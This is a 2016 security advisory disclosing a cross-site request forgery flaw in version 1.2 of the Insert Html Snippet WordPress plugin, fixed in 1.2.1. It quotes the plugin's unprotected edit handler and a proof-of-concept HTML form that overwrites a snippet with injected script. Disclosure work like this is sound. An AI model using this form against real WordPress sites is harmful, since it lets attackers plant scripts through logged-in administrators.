------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet WordPress
Plugin version 1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet version 1.2.1.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html

This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See for example the code that is used to edit a snippet.

if(isset($_POST) && isset($_POST['updateSubmit'])){
   
//       echo '<pre>';
//       print_r($_POST);
//       die("JJJ");
   $_POST = stripslashes_deep($_POST);
   $_POST = xyz_trim_deep($_POST);
   
   $xyz_ihs_snippetId = $_GET['snippetId'];
   
   $temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
   $temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);
   
   $xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
   $xyz_ihs_content = $_POST['snippetContent'];
   
   if($xyz_ihs_title != "" && $xyz_ihs_content != ""){
   
      if(ctype_alnum($temp_xyz_ihs_title))
      {
      $snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;
   
      if($snippet_count == 0){
         $xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';
   
         $wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
   <body>
      <form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
         <input type="hidden" name="snippetId" value="1" />
         <input type="hidden" name="snippetTitle" value="Fu" />
         <input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
         <input type="hidden" name="updateSubmit" value="Update" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.